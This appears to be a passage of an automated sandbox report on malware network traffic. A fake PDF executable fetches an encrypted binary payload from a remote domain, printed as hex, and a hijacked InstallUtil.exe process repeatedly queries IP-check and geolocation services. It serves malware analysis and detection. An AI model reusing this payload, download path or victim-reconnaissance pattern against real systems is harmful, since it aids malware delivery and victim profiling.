                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449760132.226.247.73808028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:40.544444084 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:41.401293039 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 6269c42f1915d37acc08c35986293931
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449762132.226.247.73808028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:42.224889040 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:43.099031925 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 64682158e50305ac833c0b13e765f4a7
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449764132.226.247.73808028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:43.867958069 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:44.730232954 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 459cc240bddc5db788945ff6dc47b71e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449766132.226.247.73808028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:45.505220890 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:46.404679060 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8dddc50093a27483833d30afc08ef2a1
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730188.132.193.464437304C:\Users\user\Desktop\dekont_001.pdf.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:08 UTC82OUTGET /ruurew/Ktanfonto.vdf HTTP/1.1
                                              Host: erkasera.com
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:09 UTC207INHTTP/1.1 200 OK
                                              Connection: close
                                              content-type: application/octet-stream
                                              last-modified: Mon, 28 Oct 2024 08:35:54 GMT
                                              accept-ranges: bytes
                                              content-length: 951816
                                              date: Mon, 28 Oct 2024 18:03:49 GMT
                                              2024-10-28 18:04:09 UTC16384INData Raw: b5 30 53 71 d9 b0 bb e6 c7 4f 73 de a1 77 c2 18 46 1d 6f 68 a7 c7 29 fd 10 02 98 2c 17 85 15 8b 81 3e 15 09 00 75 9b 2a 19 c5 15 44 cd 97 d8 ff 5f d3 7a 5a 8b 3a a2 07 a4 29 f8 58 62 bd e7 7c 04 36 99 9a 2d f1 ce 35 2d a6 01 13 1f 59 dd 49 7c a8 cc c8 e8 51 80 85 68 2f de 35 f5 a4 f0 fa bb c1 6b f4 53 5a b1 19 cb a2 be 15 db 2c db 4d 24 ce fc 77 79 48 1d 83 07 95 d4 8b da 84 af cc 64 d1 58 81 2b f5 9f ff 71 29 d0 79 e3 d1 c2 89 0e ed 00 3a 4b a9 36 5e 64 96 b1 50 6d 69 c0 11 6e 9d b4 9e ad f6 3e 5b 9f 95 6c 5a da 79 49 3e df 83 0c a2 df 36 c0 cb 85 2e df cc 50 ba 0f 0d 19 08 11 e9 70 fc 97 a9 f0 b2 35 db 8a 3f e3 73 17 ce a7 e0 f4 67 14 1e a1 72 44 0b 3b 22 21 15 01 ac 2e 47 48 06 4c 8b ed 89 32 a4 ee a5 03 50 1f e6 b3 e2 79 d0 19 16 7b 5b 4b 4e d4 76 d2
                                              Data Ascii: 0SqOswFoh),>u*D_zZ:)Xb|6-5-YI|Qh/5kSZ,M$wyHdX+q)y:K6^dPmin>[lZyI>6.Pp5?sgrD;"!.GHL2Py{[KNv
                                              2024-10-28 18:04:09 UTC16384INData Raw: e8 5b f3 98 00 3b c1 2d 66 47 45 3a 0b 89 d5 7b 3a df b0 7a ad 1f 30 12 a0 5f a2 be 98 72 1d d9 2b 77 ba 3b 36 c6 73 88 cf ac f7 d2 96 6f ff 50 14 bf 4f b3 f8 e2 16 ac ce 74 15 56 57 2a f7 02 2e 10 56 33 85 5e ab 1e 0d 78 e5 8e b5 94 90 f3 82 bc e1 87 f8 63 c6 b5 a8 94 d4 f5 94 9a a5 43 40 13 bd 86 7e 46 3f 37 83 23 01 00 a1 72 82 19 f8 86 f1 46 65 b3 30 aa 3e e9 79 77 37 8f b1 c1 50 b5 83 c8 8a b6 dd bb 4f 0a ff 9d 1d 0a 56 15 0c bb 08 23 e6 9a 85 0c fb 92 88 0f 92 70 a0 a2 8b 92 45 25 2c 9c 33 c0 11 a6 a8 5f 49 6f 8d e6 83 3c ec c0 08 ad ce 3a 63 a4 53 ed e1 c7 a7 15 1e fc 70 ee c7 40 2c c9 67 bd 8d bc 90 04 4a 8b a4 1c 91 88 36 31 2d 24 d6 f6 8d 26 f0 a7 71 53 58 5e 67 cc b1 28 c0 05 ec 6b b5 d6 d5 fb 2f 58 84 4a b2 0c a4 c3 e0 d5 11 46 aa 17 d6 08 56
                                              Data Ascii: [;-fGE:{:z0_r+w;6soPOtVW*.V3^xcC@~F?7#rFe0>yw7POV#pE%,3_Io<:cSp@,gJ61-$&qSX^g(k/XJFV
                                              2024-10-28 18:04:09 UTC16384INData Raw: 4d b4 8a f1 c4 46 7d 5f f0 5e cc 3c 1c c4 c0 61 99 85 c1 a9 16 3b 02 d2 a2 9c 42 ed 7c 88 c0 d2 6b f8 7c 8d 3c 08 5e 8e 54 c4 fa 5d a7 7c 9a 54 43 de 73 80 a1 15 90 8c 7b 01 ce c9 c4 77 4b 51 8d 41 db 9e 62 09 06 d8 6f b4 da c6 20 02 b6 83 7c ef 7b c5 08 85 15 50 d0 2c fd 47 ed e0 05 0c f4 6d bd 61 b7 0e 1c e4 7f f7 00 7d 0a 21 c6 7f e0 de a8 3f 36 ab 35 03 a6 c1 01 27 fa 5f d9 66 22 10 23 15 7d 08 1a dc 49 34 07 e4 bf 5d 93 ef 9d 4d 2c 25 b7 3e 84 22 45 3a 7a ff dd d4 19 c5 a1 91 ec a5 fc 81 af 9e 21 a0 50 a1 21 c5 be 8b 4b cb 77 76 96 34 29 b5 5f e3 3f 9d 50 8b e9 37 c3 65 a6 0e 5c 8a 89 47 bd fd d5 21 c3 06 3a ba 2e c6 85 ea 47 55 b4 3f 67 47 9b a5 24 9b 95 cd 8e 16 aa 24 f7 4c 45 a6 ad 67 b6 bd 31 d5 0c ed 46 85 b4 e2 70 9e fe 11 80 73 23 ea 67 81 a1
                                              Data Ascii: MF}_^<a;B|k|<^T]|TCs{wKQAbo |{P,Gma}!?65'_f"#}I4]M,%>"E:z!P!Kwv4)_?P7e\G!:.GU?gG$$LEg1Fps#g
                                              2024-10-28 18:04:09 UTC16384INData Raw: 9a bd d9 ff f4 5c 55 df 74 7e f1 3c 89 22 58 43 a7 a0 dd e3 fd df 15 4e 68 2e 06 04 64 7b 13 be d9 86 b2 b6 77 90 8a 6c 36 00 1a f9 0b 1f b0 a2 4a 51 b9 2c 89 3e 6e e2 1a 9d 1e b9 40 0a 13 d1 dc e3 94 91 d9 ce 94 8b f8 de 45 8f 78 95 dc d7 d6 7e 1b b5 d6 0f 89 9d ec 40 0d d3 a6 52 77 e2 0b e7 98 a8 4a 15 12 32 9c 2d 4d df 5a 5e 47 2c 82 77 56 f8 3c 5f 21 a0 01 ef 12 1b 4b 1b 6e 82 5f 64 03 d0 90 15 d0 b7 92 04 76 c0 85 fb 1f 8f ca 44 18 5d 87 e4 e0 2c 64 d7 de 41 bd 4f 58 50 b9 62 fe 62 3a 2b 7f 33 8c 99 3d 42 32 d4 45 15 91 28 98 18 33 88 3c 25 cb 82 d7 d9 ed f8 9f 09 56 29 9c 88 f7 2f 28 0f c7 cf a8 87 fb 5f 17 c7 e5 d2 92 14 37 22 8e ef 40 17 08 8d c8 06 c9 bb 80 e9 e2 b1 3b 20 f5 9c 5b 7c dd 82 ac bb a8 d8 d0 f7 9c fa 3c fa 04 f1 81 c4 0a a2 d6 9c f9
                                              Data Ascii: \Ut~<"XCNh.d{wl6JQ,>n@Ex~@RwJ2-MZ^G,wV<_!Kn_dvD],dAOXPbb:+3=B2E(3<%V)/(_7"@; [|<
                                              2024-10-28 18:04:09 UTC16384INData Raw: 0a bb 49 5c 25 40 37 cf 37 ee c2 16 df e0 fe ab 4e 04 61 2e b6 3c bc c6 17 db 75 80 83 fa 72 48 4f ee f7 b9 69 c1 e6 9f e2 40 46 d9 fc 98 68 d6 81 44 58 25 51 cf f3 f0 2d db 5e 33 fe b3 48 29 4f 44 c8 94 6b 98 50 67 f6 0f 9c 50 6d 98 48 95 16 84 71 df a9 b8 2c 5e ef 57 f3 88 cd 2f 7f 39 09 fc 1e ce 89 2e 8d 93 fc 76 c1 fa 76 5e f2 3e 12 3e 1b 2c e3 f7 19 da 44 1f cf 4c d8 64 f8 ee ad 35 ed 59 d5 92 a9 b9 c5 5c 45 a1 77 32 fb b5 80 7d ae cc db ed 01 78 f2 2b 40 df 96 9a 0e ac 48 e9 bf d7 d5 d6 11 f3 23 db b9 9e d2 a6 99 e1 19 bb d6 b2 38 d2 26 71 99 38 cb da 24 6c f4 c0 3e 70 71 84 2f 7e 74 f0 d8 89 c6 7e 78 cb 8d c2 5b c2 d0 51 33 86 29 f7 68 cd 10 9f 7d 1f c4 f7 23 fa a4 82 61 47 63 a8 1b 8f 2d da 17 fb 9a 1a ba 90 81 73 ed a4 d5 94 d2 ca 59 f7 77 b1 d9
                                              Data Ascii: I\%@77Na.<urHOi@FhDX%Q-^3H)ODkPgPmHq,^W/9.vv^>>,DLd5Y\Ew2}x+@H#8&q8$l>pq/~t~x[Q3)h}#aGc-sYw
                                              2024-10-28 18:04:09 UTC16384INData Raw: 9f b5 d1 fc e5 04 cf 4b 1d 85 7a 3b 74 1e bf 0f 47 6f e9 dc 86 0a a7 75 e3 dd 78 d8 e1 97 91 58 11 4a 26 2d af e2 58 34 4f 76 5d c0 f4 51 f8 bf eb 35 06 b4 6e 4c 20 1a e8 0d 18 9c 2d ae 3f 4e c6 9e 80 5a 20 0b 6a 64 19 96 64 e8 df 42 3c ec d0 88 44 28 51 6f 03 d7 d4 02 49 b7 c1 6a 46 8f cc fd dc 8f a1 a5 53 84 ab 8e 7c aa c4 cf b3 a6 6e 3e a7 fc 3c 0e 9f d2 6e fd 24 42 7f 01 39 05 25 ee f5 ac 25 e1 aa 36 0f c5 85 db 95 d5 39 f0 4d 59 81 eb 96 ea 09 37 38 ab 54 06 4f 5a 1f cb f5 df 5d da 65 d6 18 27 09 9d 92 c1 1b 71 6f 79 d1 cb 74 74 ed 87 0a d7 c7 60 66 63 12 e1 f3 a7 cd 6a 99 2e eb ec 67 e8 6d e9 ab 6a f8 fa 2a d3 3a 9d 7b 9b e6 34 29 ad de c1 37 55 d8 84 66 d0 97 a1 cd 13 e4 bb 49 24 20 b3 11 ca 51 df 80 1d a9 a9 d4 b0 32 fe 5c 63 ab 81 40 49 4e cd a3
                                              Data Ascii: Kz;tGouxXJ&-X4Ov]Q5nL -?NZ jddB<D(QoIjFS|n><n$B9%%69MY78TOZ]e'qoytt`fcj.gmj*:{4)7UfI$ Q2\c@IN
                                              2024-10-28 18:04:09 UTC16384INData Raw: 3f 0b d7 d7 60 33 05 d7 5f 5b 14 61 16 81 02 c3 f5 77 c4 c4 1a 03 5e 22 a6 29 25 aa 15 ac 9d ed 12 ff b9 2a 8b 77 9d 61 6d c9 d6 63 2a 46 f6 08 71 68 be 3c fd 06 b0 24 31 c8 36 81 b5 a4 75 13 37 dc a2 10 5c 41 b6 cd f5 1d 01 32 47 21 a2 ae 02 e5 cd 26 92 9f c5 95 ee 7e 32 82 ca 51 8e fe 5e 89 63 96 77 6a 52 91 29 67 16 bd ed ee 5d 18 1e 9a 88 4c b4 76 4e d4 9c cf db 8e fb be 82 2d 40 af fa 55 9d b8 30 9d 06 0e 1b 59 0c d5 af 9f a2 93 76 c4 a1 03 22 10 ef d4 36 58 91 7b 29 17 c5 8b 58 6f 01 7f f6 10 34 65 7b ad e4 19 a7 19 2e ca 1f 88 fe f6 28 20 9d 11 1d 83 5c df e2 63 3d 96 0d 8f c0 d1 8f f6 ab e0 36 08 e7 4c a6 fe 91 36 70 84 04 e5 59 01 24 22 7b 25 80 93 25 33 31 f6 35 be a1 6f 1e cf 82 5c 8b e7 f0 ff 70 10 81 22 6c e7 c3 24 61 58 28 e7 ca 14 8c e2 56
                                              Data Ascii: ?`3_[aw^")%*wamc*Fqh<$16u7\A2G!&~2Q^cwjR)g]LvN-@U0Yv"6X{)Xo4e{.( \c=6L6pY$"{%%315o\p"l$aX(V
                                              2024-10-28 18:04:09 UTC16384INData Raw: d7 7d f6 7c 4c 1f ec 8f 7b 19 00 61 a4 4d 7a f0 bd 9b 50 20 75 32 06 63 22 d1 90 c4 a5 4a 50 9c 10 b8 95 42 56 dc f7 25 4b c7 22 00 fe 85 b4 3d d2 1c c7 f6 48 7b 84 1d 82 1b 20 3c 83 52 d2 42 f7 45 2e e6 48 f3 e1 fe 7b 09 85 34 c1 a4 bf 47 e9 fa cf a6 b0 91 5d 7f 96 7d 20 01 d2 18 a0 92 ea 4c 62 45 e9 04 73 54 f1 cd 64 9d bd 7b a1 13 1d 98 38 60 49 0e 83 c2 71 db c3 ed 75 b6 bf 66 30 e6 08 c8 37 3d eb e8 1d 00 6a 1c 0c c2 bb da f6 fc 73 59 4e c6 d7 fb 75 8e e1 4a 87 d0 ad 2a 25 d1 df 0e 72 47 bc b7 6d 07 9b 9b 71 1e 0f e1 7a 9e e1 db 4a 18 21 f8 f8 c6 48 48 22 75 67 07 e2 b0 51 5b e9 19 44 75 f7 de fd bc 8c 06 ab 24 67 65 cf ee cc 65 27 26 15 22 b2 cb c1 3c 1c cd 70 c4 a6 6b 4d a4 c5 4d 99 c3 ca 0a 5a 1a 8c 92 fb 68 bc 94 db 34 7b 17 ff 67 66 d0 38 b4 df
                                              Data Ascii: }|L{aMzP u2c"JPBV%K"=H{ <RBE.H{4G]} LbEsTd{8`Iquf07=jsYNuJ*%rGmqzJ!HH"ugQ[Du$gee'&"<pkMMZh4{gf8
                                              2024-10-28 18:04:10 UTC16384INData Raw: 44 fb ad 0c 66 e1 5f 99 43 3b d8 ec 0d d1 07 18 8e d6 72 69 36 72 55 13 59 05 e1 01 5b c4 ed 71 19 c7 0b 7a ab 6f 09 45 be 85 58 28 00 eb a2 23 9e d9 3f e9 e9 f8 1a 27 d0 28 65 e4 2b fd 1f 4c 26 4d 6b b5 1e 01 ac 85 ae 28 68 a5 f4 dd 65 8e 61 51 f3 7c 22 9b 18 23 8d fb 36 a6 01 40 7d 81 11 37 e7 5c 43 b8 f9 ce de ce da aa 5f 2a f8 c5 6e 7a 39 2b 09 d0 fc 88 f0 51 f4 21 35 4a 69 ef 2c 27 1a 83 ac f9 3e 10 f8 0a fc 7c db e1 dc 7a e0 af b6 3f 94 68 82 be 00 9d ca f2 9a fe 61 f5 f6 04 3e 85 b0 c4 28 36 18 5c 00 24 cc 21 f0 e2 21 c0 65 e5 cd 45 4c 31 71 a2 00 43 8e f9 06 44 d7 88 a1 0b b2 bb 65 34 56 31 ef e2 e3 24 91 a3 63 83 57 1e 69 a8 40 51 2c 4d 86 52 a8 80 e6 3c 2e 65 4d 37 69 5b 86 b4 7c 26 ff 49 c2 60 34 0d 07 af 41 03 f7 f5 0b 9e 35 17 03 86 87 47 23
                                              Data Ascii: Df_C;ri6rUY[qzoEX(#?'(e+L&Mk(heaQ|"#6@}7\C_*nz9+Q!5Ji,'>|z?ha>(6\$!!eEL1qCDe4V1$cWi@Q,MR<.eM7i[|&I`4A5G#
                                              2024-10-28 18:04:10 UTC16384INData Raw: b4 ee 08 5d d6 6e d8 e9 dd 73 13 37 54 e8 e8 f8 e3 96 56 60 a7 23 e3 fa 80 b0 1f 72 62 59 30 97 e0 d2 22 c2 0d ed 18 a0 f9 63 6c 53 c6 e7 b9 f8 82 53 23 7f 17 41 44 d8 a1 5d 22 e8 5c 97 d5 7a 7f c5 89 34 c2 45 d5 4d c6 da 1e 82 db 73 47 c2 b5 6a 67 13 2f 0d 0e 49 3e 38 f4 ee 2b be 09 94 2e e9 a9 ea 0b 68 1a 5f c7 c7 51 60 fd 86 52 ab 49 68 42 98 81 77 ea 3a bb b8 6d 11 81 b6 a3 93 9b 1f 57 e5 13 92 69 6b 23 e4 22 32 b4 54 6f 70 6e 11 30 07 18 7e 78 fb 1c 61 df c3 92 e8 87 86 5c 03 82 4a 60 52 28 7b d8 41 0e 61 20 02 70 34 5e c3 9d fd c7 a9 d1 89 07 66 61 8d 90 15 64 28 ad 00 d3 7d cb 91 4f c9 9f 4f 31 18 b4 0a d6 5f ab 76 ef ed ff 8c 7f 6f ae 7e a0 ee 12 bb d0 2b 99 f2 51 f5 86 db 99 29 dd 95 7d f9 b2 0e 04 7c 1d 87 e4 cc 97 6c 08 4b 82 30 ae db 7d a3 25
                                              Data Ascii: ]ns7TV`#rbY0"clSS#AD]"\z4EMsGjg/I>8+.h_Q`RIhBw:mWik#"2Topn0~xa\J`R({Aa p4^fad(}OO1_vo~+Q)}|lK0}%


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449732188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:17 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:18 UTC881INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:18 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55319
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h21RbSX3kBenshGe2ygKOTtTEwOam1%2FnGy6cfzvsWzArZ%2BrHzXOEmzPPMk89rUNQhFXp7YUCmYtQdk5pVAwMXeWT53XiCOiRSzlReEvgJfyc4S0FzujGAv1l%2B5eNk4EH8QPSC4iW"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd8f48871bcaa-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=20195&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=143515&cwnd=32&unsent_bytes=0&cid=7189ea7a17ceb36c&ts=259&x=0"
                                              2024-10-28 18:04:18 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449733188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:18 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-10-28 18:04:19 UTC888INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:19 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVhc-iOyPHcEJSw=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 61290
                                              Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGjg%2Bbf3BVPLRJihsT0A%2FGVfdl0uBssyPRZLAzBMC6x6oztN7%2Br%2FCMBmdqFeyfl%2F0iuEMzj7YrZJfwhNAqBT%2B1S1FgjuyrC3NP6w2MDJHDMjMnR4NqInNx20rmdt7Y9GmFAq12eJ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd8fb0ea96c79-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1121&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2681481&cwnd=251&unsent_bytes=0&cid=f60315e5832f0969&ts=158&x=0"
                                              2024-10-28 18:04:19 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449735188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:20 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:20 UTC877INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:20 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55321
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3q05WazEXpRWQrxD7IEAlpjmI1FaDiSkpsrCDyBiOcodLmcLV6ATDZt36QV8Hm0OvIYEDoK5j9MdjbbIM09PCX8tZLaUSg5yHdFoocs%2FQgUYdOf7rAZ2B4CvIORIUr84RuKjYS2g"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd9059a4a1365-ATL
                                              alt-svc: h3=":443"; ma=86400
